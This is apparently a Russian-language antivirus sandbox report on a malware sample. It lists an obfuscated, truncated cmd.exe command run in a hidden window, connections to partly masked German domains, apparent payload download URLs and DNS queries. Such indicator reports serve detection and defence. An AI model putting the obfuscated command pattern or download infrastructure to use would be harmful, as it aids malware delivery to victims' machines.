Техническая информация
- '<SYSTEM32>\cmd.exe' zvLwqMkJRwcft kZEZlIXbZEDqqtULfAbYVIFszoM MYhKzmwZvSa & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %SGwJbziCQrfVMlk%=XjudrQN&&set %LGkEYtSGnjq%=p&&set %XntSKRAS...
- 'e-###ktion.de':80
- 'ra####r-eglofs.de':80
- 'ra####r-eglofs.de':443
- '4-###demanns.de':80
- 'pr###smeiler.de':80
- 'pr###smeiler.de':443
- http://e-###ktion.de/1sy1Dc/
- http://ra####r-eglofs.de/KPIv/
- http://4-###demanns.de/ykxEURF/
- http://pr###smeiler.de/y7kuQW/
- 'ra####r-eglofs.de':443
- 'pr###smeiler.de':443
- DNS ASK va######csightseeing.com
- DNS ASK e-###ktion.de
- DNS ASK ra####r-eglofs.de
- DNS ASK 4-###demanns.de
- DNS ASK pr###smeiler.de
- '<SYSTEM32>\cmd.exe' zvLwqMkJRwcft kZEZlIXbZEDqqtULfAbYVIFszoM MYhKzmwZvSa & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %SGwJbziCQrfVMlk%=XjudrQN&&set %LGkEYtSGnjq%=p&&set %XntSKRAS...' (со скрытым окном)